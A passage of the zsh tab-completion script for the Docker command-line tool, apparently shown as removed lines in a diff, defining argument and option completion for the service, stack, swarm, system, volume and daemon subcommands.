- case "${${words[-1]%=*}#*=}" in - (desired-state) - state_opts=('accepted' 'running') - _describe -t state-opts "desired state options" state_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('desired-state' 'id' 'label' 'name') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_services() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines services - - type=$1; shift - - lines=(${(f)${:-"$(_call_program commands docker $docker_options service ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Service ID - if [[ $type = (ids|all) ]]; then - for line in $lines; do - s="${line[${begin[ID]},${end[ID]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}" - services=($services $s) - done - fi - - # Names - if [[ $type = (names|all) ]]; then - for line in $lines; do - s="${line[${begin[NAME]},${end[NAME]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[IMAGE]},${end[IMAGE]}]}%% ##}}" - services=($services $s) - done - fi - - _describe -t services-list "services" services "$@" && ret=0 - return ret -} - -__docker_complete_services() { - [[ $PREFIX = -* ]] && return 1 - __docker_services all "$@" -} - -__docker_complete_services_ids() { - [[ $PREFIX = -* ]] && return 1 - __docker_services ids "$@" -} - -__docker_complete_services_names() { - [[ $PREFIX = -* ]] && return 1 - __docker_services names "$@" -} - -__docker_service_commands() { - local -a _docker_service_subcommands - _docker_service_subcommands=( - "create:Create a new service" - "inspect:Display detailed information on one or more services" - "ls:List services" - "rm:Remove one or more services" - "scale:Scale one or multiple replicated services" - "ps:List the tasks of a service" - "update:Update a service" - ) - _describe -t docker-service-commands "docker service command" _docker_service_subcommands -} - -__docker_service_subcommand() { - local -a _command_args opts_help opts_create_update - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - opts_create_update=( - "($help)*--constraint=[Placement constraints]:constraint: " - "($help)--endpoint-mode=[Placement constraints]:mode:(dnsrr vip)" - "($help)*"{-e=,--env=}"[Set environment variables]:env: " - "($help)--health-cmd=[Command to run to check health]:command: " - "($help)--health-interval=[Time between running the check]:time: " - "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)" - "($help)--health-timeout=[Maximum time to allow one check to run]:time: " - "($help)--hostname=[Service container hostname]:hostname: " \ - "($help)*--label=[Service labels]:label: " - "($help)--limit-cpu=[Limit CPUs]:value: " - "($help)--limit-memory=[Limit Memory]:value: " - "($help)--log-driver=[Logging driver for service]:logging driver:__docker_complete_log_drivers" - "($help)*--log-opt=[Logging driver options]:log driver options:__docker_complete_log_options" - "($help)*--mount=[Attach a filesystem mount to the service]:mount: " - "($help)*--network=[Network attachments]:network: " - "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]" - "($help)*"{-p=,--publish=}"[Publish a port as a node port]:port: " - "($help)--replicas=[Number of tasks]:replicas: " - "($help)--reserve-cpu=[Reserve CPUs]:value: " - "($help)--reserve-memory=[Reserve Memory]:value: " - "($help)--restart-condition=[Restart when condition is met]:mode:(any none on-failure)" - "($help)--restart-delay=[Delay between restart attempts]:delay: " - "($help)--restart-max-attempts=[Maximum number of restarts before giving up]:max-attempts: " - "($help)--restart-window=[Window used to evaluate the restart policy]:window: " - "($help)*--secret=[Specify secrets to expose to the service]:secret:__docker_complete_secrets" - "($help)--stop-grace-period=[Time to wait before force killing a container]:grace period: " - "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-TTY]" - "($help)--update-delay=[Delay between updates]:delay: " - "($help)--update-failure-action=[Action on update failure]:mode:(pause continue)" - "($help)--update-max-failure-ratio=[Failure rate to tolerate during an update]:fraction: " - "($help)--update-monitor=[Duration after each task update to monitor for failure]:window: " - "($help)--update-parallelism=[Maximum number of tasks updated simultaneously]:number: " - "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" - "($help)--with-registry-auth[Send registry authentication details to swarm agents]" - "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories" - ) - - case "$words[1]" in - (create) - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_create_update \ - "($help)*--container-label=[Container labels]:label: " \ - "($help)*--dns=[Set custom DNS servers]:DNS: " \ - "($help)*--dns-option=[Set DNS options]:DNS option: " \ - "($help)*--dns-search=[Set custom DNS search domains]:DNS search: " \ - "($help)*--env-file=[Read environment variables from a file]:environment file:_files" \ - "($help)--mode=[Service Mode]:mode:(global replicated)" \ - "($help)--name=[Service name]:name: " \ - "($help)*--publish=[Publish a port]:port: " \ - "($help -): :__docker_complete_images" \ - "($help -):command: _command_names -e" \ - "($help -)*::arguments: _normal" && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help)--pretty[Print the information in a human friendly format]" \ - "($help -)*:service:__docker_complete_services" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:->filter-options" \ - "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" && ret=0 - case $state in - (filter-options) - __docker_service_complete_ls_filters && ret=0 - ;; - esac - ;; - (rm|remove) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:service:__docker_complete_services" && ret=0 - ;; - (scale) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -)*:service:->values" && ret=0 - case $state in - (values) - if compset -P '*='; then - _message 'replicas' && ret=0 - else - __docker_complete_services -qS "=" - fi - ;; - esac - ;; - (ps) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help)--no-resolve[Do not map IDs to Names]" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -q --quiet)"{-q,--quiet}"[Only display task IDs]" \ - "($help -)1:service:__docker_complete_services" && ret=0 - case $state in - (filter-options) - __docker_service_complete_ps_filters && ret=0 - ;; - esac - ;; - (update) - _arguments $(__docker_arguments) \ - $opts_help \ - $opts_create_update \ - "($help)--arg=[Service command args]:arguments: _normal" \ - "($help)*--container-label-add=[Add or update container labels]:label: " \ - "($help)*--container-label-rm=[Remove a container label by its key]:label: " \ - "($help)*--dns-add=[Add or update custom DNS servers]:DNS: " \ - "($help)*--dns-rm=[Remove custom DNS servers]:DNS: " \ - "($help)*--dns-option-add=[Add or update DNS options]:DNS option: " \ - "($help)*--dns-option-rm=[Remove DNS options]:DNS option: " \ - "($help)*--dns-search-add=[Add or update custom DNS search domains]:DNS search: " \ - "($help)*--dns-search-rm=[Remove DNS search domains]:DNS search: " \ - "($help)--force[Force update]" \ - "($help)*--group-add=[Add additional supplementary user groups to the container]:group:_groups" \ - "($help)*--group-rm=[Remove previously added supplementary user groups from the container]:group:_groups" \ - "($help)--image=[Service image tag]:image:__docker_complete_repositories" \ - "($help)*--publish-add=[Add or update a port]:port: " \ - "($help)*--publish-rm=[Remove a port(target-port mandatory)]:port: " \ - "($help)--rollback[Rollback to previous specification]" \ - "($help -)1:service:__docker_complete_services" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_service_commands" && ret=0 - ;; - esac - - return ret -} - -# EO service - -# BO stack - -__docker_stack_complete_ps_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (desired-state) - state_opts=('accepted' 'running') - _describe -t state-opts "desired state options" state_opts && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('desired-state' 'id' 'name') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_stack_complete_services_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('id' 'label' 'name') - _describe -t filter-opts "filter options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_stacks() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - local line s - declare -a lines stacks - - lines=(${(f)${:-"$(_call_program commands docker $docker_options stack ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Service ID - for line in $lines; do - s="${line[${begin[ID]},${end[ID]}]%% ##}" - stacks=($stacks $s) - done - - _describe -t stacks-list "stacks" stacks "$@" && ret=0 - return ret -} - -__docker_complete_stacks() { - [[ $PREFIX = -* ]] && return 1 - __docker_stacks "$@" -} - -__docker_stack_commands() { - local -a _docker_stack_subcommands - _docker_stack_subcommands=( - "deploy:Deploy a new stack or update an existing stack" - "ls:List stacks" - "ps:List the tasks in the stack" - "rm:Remove the stack" - "services:List the services in the stack" - ) - _describe -t docker-stack-commands "docker stack command" _docker_stack_subcommands -} - -__docker_stack_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (deploy|up) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--bundle-file=[Path to a Distributed Application Bundle file]:dab:_files -g \"*.dab\"" \ - "($help -c --compose-file)"{-c=,--compose-file=}"[Path to a Compose file]:compose file:_files -g \"*.(yml|yaml)\"" \ - "($help)--with-registry-auth[Send registry authentication details to Swarm agents]" \ - "($help -):stack:__docker_complete_stacks" && ret=0 - ;; - (ls|list) - _arguments $(__docker_arguments) \ - $opts_help && ret=0 - ;; - (ps) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Display all tasks]" \ - "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_ps_filters" \ - "($help)--no-resolve[Do not map IDs to Names]" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -):stack:__docker_complete_stacks" && ret=0 - ;; - (rm|remove|down) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -):stack:__docker_complete_stacks" && ret=0 - ;; - (services) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Filter output based on conditions provided]:filter:__docker_stack_complete_services_filters" \ - "($help -q --quiet)"{-q,--quiet}"[Only display IDs]" \ - "($help -):stack:__docker_complete_stacks" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_stack_commands" && ret=0 - ;; - esac - - return ret -} - -# EO stack - -# BO swarm - -__docker_swarm_commands() { - local -a _docker_swarm_subcommands - _docker_swarm_subcommands=( - "init:Initialize a swarm" - "join:Join a swarm as a node and/or manager" - "join-token:Manage join tokens" - "leave:Leave a swarm" - "update:Update the swarm" - ) - _describe -t docker-swarm-commands "docker swarm command" _docker_swarm_subcommands -} - -__docker_swarm_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (init) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--advertise-addr[Advertised address]:ip\:port: " \ - "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \ - "($help)--force-new-cluster[Force create a new cluster from current state]" \ - "($help)--listen-addr=[Listen address]:ip\:port: " \ - "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \ - "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \ - "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0 - ;; - (join) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help)--advertise-addr=[Advertised address]:ip\:port: " \ - "($help)--availability=[Availability of the node]:availability:(active drain pause)" \ - "($help)--listen-addr=[Listen address]:ip\:port: " \ - "($help)--token=[Token for entry into the swarm]:secret: " \ - "($help -):host\:port: " && ret=0 - ;; - (join-token) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -q --quiet)"{-q,--quiet}"[Only display token]" \ - "($help)--rotate[Rotate join token]" \ - "($help -):role:(manager worker)" && ret=0 - ;; - (leave) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force this node to leave the swarm, ignoring warnings]" && ret=0 - ;; - (update) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)--cert-expiry=[Validity period for node certificates]:duration: " \ - "($help)*--external-ca=[Specifications of one or more certificate signing endpoints]:endpoint: " \ - "($help)--dispatcher-heartbeat=[Dispatcher heartbeat period]:duration: " \ - "($help)--max-snapshots[Number of additional Raft snapshots to retain]" \ - "($help)--snapshot-interval[Number of log entries between Raft snapshots]" \ - "($help)--task-history-limit=[Task history retention limit]:limit: " && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_network_commands" && ret=0 - ;; - esac - - return ret -} - -# EO swarm - -# BO system - -__docker_system_commands() { - local -a _docker_system_subcommands - _docker_system_subcommands=( - "df:Show docker filesystem usage" - "events:Get real time events from the server" - "info:Display system-wide information" - "prune:Remove unused data" - ) - _describe -t docker-system-commands "docker system command" _docker_system_subcommands -} - -__docker_system_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (df) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -v --verbose)"{-v,--verbose}"[Show detailed information on space usage]" && ret=0 - ;; - (events) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_events_filter" \ - "($help)--since=[Events created since this timestamp]:timestamp: " \ - "($help)--until=[Events created until this timestamp]:timestamp: " \ - "($help)--format=[Format the output using the given go template]:template: " && ret=0 - ;; - (info) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " && ret=0 - ;; - (prune) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -a --all)"{-a,--all}"[Remove all unused data, not just dangling ones]" \ - "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \ - "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0 - ;; - esac - - return ret -} - -# EO system - -# BO volume - -__docker_volume_complete_ls_filters() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - - if compset -P '*='; then - case "${${words[-1]%=*}#*=}" in - (dangling) - dangling_opts=('true' 'false') - _describe -t dangling-filter-opts "Dangling Filter Options" dangling_opts && ret=0 - ;; - (driver) - __docker_complete_info_plugins Volume && ret=0 - ;; - (name) - __docker_complete_volumes && ret=0 - ;; - *) - _message 'value' && ret=0 - ;; - esac - else - opts=('dangling' 'driver' 'label' 'name') - _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0 - fi - - return ret -} - -__docker_complete_volumes() { - [[ $PREFIX = -* ]] && return 1 - integer ret=1 - declare -a lines volumes - - lines=(${(f)${:-"$(_call_program commands docker $docker_options volume ls)"$'\n'}}) - - # Parse header line to find columns - local i=1 j=1 k header=${lines[1]} - declare -A begin end - while (( j < ${#header} - 1 )); do - i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 )) - j=$(( i + ${${header[$i,-1]}[(i) ]} - 1 )) - k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 )) - begin[${header[$i,$((j-1))]}]=$i - end[${header[$i,$((j-1))]}]=$k - done - end[${header[$i,$((j-1))]}]=-1 - lines=(${lines[2,-1]}) - - # Names - local line s - for line in $lines; do - s="${line[${begin[VOLUME NAME]},${end[VOLUME NAME]}]%% ##}" - s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}" - volumes=($volumes $s) - done - - _describe -t volumes-list "volumes" volumes && ret=0 - return ret -} - -__docker_volume_commands() { - local -a _docker_volume_subcommands - _docker_volume_subcommands=( - "create:Create a volume" - "inspect:Display detailed information on one or more volumes" - "ls:List volumes" - "prune:Remove all unused volumes" - "rm:Remove one or more volumes" - ) - _describe -t docker-volume-commands "docker volume command" _docker_volume_subcommands -} - -__docker_volume_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (create) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help -d --driver)"{-d=,--driver=}"[Volume driver name]:Driver name:(local)" \ - "($help)*--label=[Set metadata for a volume]:label=value: " \ - "($help)*"{-o=,--opt=}"[Driver specific options]:Driver option: " \ - "($help -)1:Volume name: " && ret=0 - ;; - (inspect) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help -)1:volume:__docker_complete_volumes" && ret=0 - ;; - (ls) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \ - "($help)--format=[Pretty-print volumes using a Go template]:template: " \ - "($help -q --quiet)"{-q,--quiet}"[Only display volume names]" && ret=0 - case $state in - (filter-options) - __docker_volume_complete_ls_filters && ret=0 - ;; - esac - ;; - (prune) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0 - ;; - (rm) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --force)"{-f,--force}"[Force the removal of one or more volumes]" \ - "($help -):volume:__docker_complete_volumes" && ret=0 - ;; - (help) - _arguments $(__docker_arguments) ":subcommand:__docker_volume_commands" && ret=0 - ;; - esac - - return ret -} - -# EO volume - -__docker_caching_policy() { - oldp=( "$1"(Nmh+1) ) # 1 hour - (( $#oldp )) -} - -__docker_commands() { - local cache_policy - - zstyle -s ":completion:${curcontext}:" cache-policy cache_policy - if [[ -z "$cache_policy" ]]; then - zstyle ":completion:${curcontext}:" cache-policy __docker_caching_policy - fi - - if ( [[ ${+_docker_subcommands} -eq 0 ]] || _cache_invalid docker_subcommands) \ - && ! _retrieve_cache docker_subcommands; - then - local -a lines - lines=(${(f)"$(_call_program commands docker 2>&1)"}) - _docker_subcommands=(${${${(M)${lines[$((${lines[(i)*Commands:]} + 1)),-1]}:# *}## #}/ ##/:}) - _docker_subcommands=($_docker_subcommands 'daemon:Enable daemon mode' 'help:Show help for a command') - (( $#_docker_subcommands > 2 )) && _store_cache docker_subcommands _docker_subcommands - fi - _describe -t docker-commands "docker command" _docker_subcommands -} - -__docker_subcommand() { - local -a _command_args opts_help - local expl help="--help" - integer ret=1 - - opts_help=("(: -)--help[Print usage]") - - case "$words[1]" in - (attach|commit|cp|create|diff|exec|export|kill|logs|pause|unpause|port|rename|restart|rm|run|start|stats|stop|top|update|wait) - __docker_container_subcommand && ret=0 - ;; - (build|history|import|load|pull|push|save|tag) - __docker_image_subcommand && ret=0 - ;; - (container) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_container_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_container_subcommand && ret=0 - ;; - esac - ;; - (daemon) - _arguments $(__docker_arguments) \ - $opts_help \ - "($help)*--add-runtime=[Register an additional OCI compatible runtime]:runtime:__docker_complete_runtimes" \ - "($help)--api-cors-header=[CORS headers in the Engine API]:CORS headers: " \ - "($help)*--authorization-plugin=[Authorization plugins to load]" \ - "($help -b --bridge)"{-b=,--bridge=}"[Attach containers to a network bridge]:bridge:_net_interfaces" \ - "($help)--bip=[Network bridge IP]:IP address: " \ - "($help)--cgroup-parent=[Parent cgroup for all containers]:cgroup: " \ - "($help)--cluster-advertise=[Address or interface name to advertise]:Instance to advertise (host\:port): " \ - "($help)--cluster-store=[URL of the distributed storage backend]:Cluster Store:->cluster-store" \ - "($help)*--cluster-store-opt=[Cluster store options]:Cluster options:->cluster-store-options" \ - "($help)--config-file=[Path to daemon configuration file]:Config File:_files" \ - "($help)--containerd=[Path to containerd socket]:socket:_files -g \"*.sock\"" \ - "($help -D --debug)"{-D,--debug}"[Enable debug mode]" \ - "($help)--default-gateway[Container default gateway IPv4 address]:IPv4 address: " \ - "($help)--default-gateway-v6[Container default gateway IPv6 address]:IPv6 address: " \ - "($help)*--default-ulimit=[Default ulimits for containers]:ulimit: " \ - "($help)--disable-legacy-registry[Disable contacting legacy registries]" \ - "($help)*--dns=[DNS server to use]:DNS: " \ - "($help)*--dns-opt=[DNS options to use]:DNS option: " \ - "($help)*--dns-search=[DNS search domains to use]:DNS search: " \ - "($help)*--exec-opt=[Runtime execution options]:runtime execution options: " \ - "($help)--exec-root=[Root directory for execution state files]:path:_directories" \ - "($help)--experimental[Enable experimental features]" \ - "($help)--fixed-cidr=[IPv4 subnet for fixed IPs]:IPv4 subnet: " \ - "($help)--fixed-cidr-v6=[IPv6 subnet for fixed IPs]:IPv6 subnet: " \ - "($help -G --group)"{-G=,--group=}"[Group for the unix socket]:group:_groups" \ - "($help -g --graph)"{-g=,--graph=}"[Root of the Docker runtime]:path:_directories" \ - "($help -H --host)"{-H=,--host=}"[tcp://host:port to bind/connect to]:host: " \ - "($help)--icc[Enable inter-container communication]" \ - "($help)--init[Run an init inside containers to forward signals and reap processes]" \ - "($help)--init-path=[Path to the docker-init binary]:docker-init binary:_files" \ - "($help)*--insecure-registry=[Enable insecure registry communication]:registry: " \ - "($help)--ip=[Default IP when binding container ports]" \ - "($help)--ip-forward[Enable net.ipv4.ip_forward]" \ - "($help)--ip-masq[Enable IP masquerading]" \ - "($help)--iptables[Enable addition of iptables rules]" \ - "($help)--ipv6[Enable IPv6 networking]" \ - "($help -l --log-level)"{-l=,--log-level=}"[Logging level]:level:(debug info warn error fatal)" \ - "($help)*--label=[Key=value labels]:label: " \ - "($help)--live-restore[Enable live restore of docker when containers are still running]" \ - "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers" \ - "($help)*--log-opt=[Default log driver options for containers]:log driver options:__docker_complete_log_options" \ - "($help)--max-concurrent-downloads[Set the max concurrent downloads for each pull]" \ - "($help)--max-concurrent-uploads[Set the max concurrent uploads for each push]" \ - "($help)--mtu=[Network MTU]:mtu:(0 576 1420 1500 9000)" \ - "($help)--oom-score-adjust=[Set the oom_score_adj for the daemon]:oom-score:(-500)" \ - "($help -p --pidfile)"{-p=,--pidfile=}"[Path to use for daemon PID file]:PID file:_files" \ - "($help)--raw-logs[Full timestamps without ANSI coloring]" \ - "($help)*--registry-mirror=[Preferred Docker registry mirror]:registry mirror: " \ - "($help)--seccomp-profile=[Path to seccomp profile]:path:_files -g \"*.json\"" \ - "($help -s --storage-driver)"{-s=,--storage-driver=}"[Storage driver to use]:driver:(aufs btrfs devicemapper overlay overlay2 vfs zfs)" \ - "($help)--selinux-enabled[Enable selinux support]" \ - "($help)--shutdown-timeout=[Set the shutdown timeout value in seconds]:time: " \ - "($help)*--storage-opt=[Storage driver options]:storage driver options: " \ - "($help)--tls[Use TLS]" \ - "($help)--tlscacert=[Trust certs signed only by this CA]:PEM file:_files -g \"*.(pem|crt)\"" \ - "($help)--tlscert=[Path to TLS certificate file]:PEM file:_files -g \"*.(pem|crt)\"" \ - "($help)--tlskey=[Path to TLS key file]:Key file:_files -g \"*.(pem|key)\"" \ - "($help)--tlsverify[Use TLS and verify the remote]" \ - "($help)--userns-remap=[User/Group setting for user namespaces]:user\:group:->users-groups" \ - "($help)--userland-proxy[Use userland proxy for loopback traffic]" \ - "($help)--userland-proxy-path=[Path to the userland proxy binary]:binary:_files" && ret=0 - - case $state in - (cluster-store) - if compset -P '*://'; then - _message 'host:port' && ret=0 - else - store=('consul' 'etcd' 'zk') - _describe -t cluster-store "Cluster Store" store -qS "://" && ret=0 - fi - ;; - (cluster-store-options) - if compset -P '*='; then - _files && ret=0 - else - opts=('discovery.heartbeat' 'discovery.ttl' 'kv.cacertfile' 'kv.certfile' 'kv.keyfile' 'kv.path') - _describe -t cluster-store-opts "Cluster Store Options" opts -qS "=" && ret=0 - fi - ;; - (users-groups) - if compset -P '*:'; then - _groups && ret=0 - else - _describe -t userns-default "default Docker user management" '(default)' && ret=0 - _users && ret=0 - fi - ;; - esac - ;; - (events|info) - __docker_system_subcommand && ret=0 - ;; - (image) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_image_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_image_subcommand && ret=0 - ;; - esac - ;; - (images) - words[1]='ls' - __docker_image_subcommand && ret=0 - ;; - (inspect) - local state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \ - "($help -s --size)"{-s,--size}"[Display total file sizes if the type is container]" \ - "($help)--type=[Return JSON for specified type]:type:(container image network node plugin service volume)" \ - "($help -)*: :->values" && ret=0 - - case $state in - (values) - if [[ ${words[(r)--type=container]} == --type=container ]]; then - __docker_complete_containers && ret=0 - elif [[ ${words[(r)--type=image]} == --type=image ]]; then - __docker_complete_images && ret=0 - elif [[ ${words[(r)--type=network]} == --type=network ]]; then - __docker_complete_networks && ret=0 - elif [[ ${words[(r)--type=node]} == --type=node ]]; then - __docker_complete_nodes && ret=0 - elif [[ ${words[(r)--type=plugin]} == --type=plugin ]]; then - __docker_complete_plugins && ret=0 - elif [[ ${words[(r)--type=service]} == --type=service ]]; then - __docker_complete_services && ret=0 - elif [[ ${words[(r)--type=volume]} == --type=volume ]]; then - __docker_complete_volumes && ret=0 - else - __docker_complete_containers - __docker_complete_images - __docker_complete_networks - __docker_complete_nodes - __docker_complete_plugins - __docker_complete_services - __docker_complete_volumes && ret=0 - fi - ;; - esac - ;; - (login) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help -p --password)"{-p=,--password=}"[Password]:password: " \ - "($help -u --user)"{-u=,--user=}"[Username]:username: " \ - "($help -)1:server: " && ret=0 - ;; - (logout) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help -)1:server: " && ret=0 - ;; - (network) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_network_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_network_subcommand && ret=0 - ;; - esac - ;; - (node) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_node_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_node_subcommand && ret=0 - ;; - esac - ;; - (plugin) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_plugin_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_plugin_subcommand && ret=0 - ;; - esac - ;; - (ps) - words[1]='ls' - __docker_container_subcommand && ret=0 - ;; - (rmi) - words[1]='rm' - __docker_image_subcommand && ret=0 - ;; - (search) - _arguments $(__docker_arguments) -A '-*' \ - $opts_help \ - "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \ - "($help)--limit=[Maximum returned search results]:limit:(1 5 10 25 50)" \ - "($help)--no-trunc[Do not truncate output]" \ - "($help -):term: " && ret=0 - - case $state in - (filter-options) - __docker_complete_search_filters && ret=0 - ;; - esac - ;; - (secret) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_secret_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_secret_subcommand && ret=0 - ;; - esac - ;; - (service) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_service_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_service_subcommand && ret=0 - ;; - esac - ;; - (stack) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: :->option-or-argument" && ret=0 - - case $state in - (command) - __docker_stack_commands && ret=0 - ;; - (option-or-argument) - curcontext=${curcontext%:*:*}:docker-${words[-1]}: - __docker_stack_subcommand && ret=0 - ;; - esac - ;; - (swarm) - local curcontext="$curcontext" state - _arguments $(__docker_arguments) \ - $opts_help \ - "($help -): :->command" \ - "($help -)*:: 